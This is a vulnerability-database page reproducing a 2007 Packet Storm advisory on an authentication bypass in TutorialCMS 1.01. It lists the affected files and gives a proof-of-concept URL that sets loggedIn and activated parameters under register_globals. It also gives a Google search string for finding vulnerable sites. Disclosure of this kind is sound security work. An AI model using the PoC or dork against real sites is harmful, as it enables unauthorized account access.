Lucene search

tutorialcms-bypass.txt

🗓️ 22 May 2007 00:00:00Reported by SilentzType

packetstorm🔗 packetstormsecurity.com👁 21 Views

TutorialCMS 1.01 Auth Bypass. $loggedIn & $activated not predefined. Vulnerable files: login.php, headerLinks.php, submit1.php, myFav.php, userCP.php. PoC: http://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1. Subject To: register_globals on

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`#################################################################################  
# #  
# TutorialCMS <= 1.01 Authentication Bypass #  
# #  
# Discovered by: Silentz #  
# Payload: Authentication Bypass #  
# Website: http://www.w4ck1ng.com #  
# #  
# Vulnerability: #  
# #  
# Variables $loggedIn & $activated are not predefined. #  
# #  
# Vulnerable Files: #  
# #  
# login.php #  
# headerLinks.php #  
# submit1.php #  
# myFav.php #  
# userCP.php #  
# #  
# #  
# PoC: http://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1 #  
# #  
# Subject To: register_globals set to on #  
# GoogleDork: "Powered By Photoshop Tutorials" #  
# #  
# Shoutz: The entire w4ck1ng community #  
# #  
# Notes to developers: #  
# #  
# You should allways fully disclose the vulnerabilities before someone #  
# else does, just looks better. Also, try changing the "Date Modified" #  
# stamp on the files before you wrap it up for upload ;) #  
# #  
#################################################################################  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

22 May 2007 00:00Current

7.4High risk

Vulners AI Score7.4